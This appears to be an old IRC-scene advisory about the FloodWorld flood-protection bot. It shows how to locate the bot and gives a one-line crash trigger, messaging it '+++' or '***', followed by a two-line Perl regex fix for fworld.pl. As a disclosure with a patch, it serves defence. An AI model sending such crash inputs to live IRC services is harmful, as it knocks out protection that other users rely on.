FloodWorld IRC Network Flood Protection Remote Exploit for ALL VERSIONS!!! http://www.floodworld.com Exploit: Exploit do crashing the FloodWorld Service How Find Floodworld ?: Connect to irc server enter "/whois FloodWolrd" if see that floodworld is right here floodworld is floodworld@* XXX floodworld using floodworld.XXX.XXX Network flood protection floodworld has identified for this nick Floodworld End of /WHOIS list. How Works ? : eheh enter "/msg Floodworld +++" or "/msg Floodworld ***" floodworld is crashing and need a restart How Fix ? : Go to that line in fworld.pl ############### # This sections of the loops makes sure # that all mIRC Color Codes, Bold Char, # Underline Char, Reverse Char, and # Regular Char is stripped from any # messages. (High ASCII Char's set in config.pm) $temp =~ s/[$Bold,$UnderLine,$Reverse,$Regular]//g; $temp =~ s/$Color[0-9]{1,2},[0-9]{1,2}//g; $temp =~ s/$Color[0-9]{1,2}//g; $temp =~ s/$Color//g; $temp =~ s/\?\?\?\?//g; and add this two lines $temp =~ s/\+\+//g; $temp =~ s/\*\*//g; and floodworld is fixed for this exploit Greetz: BoSSaLiNiE http://BoSSaLiNiE.ELiTE.TO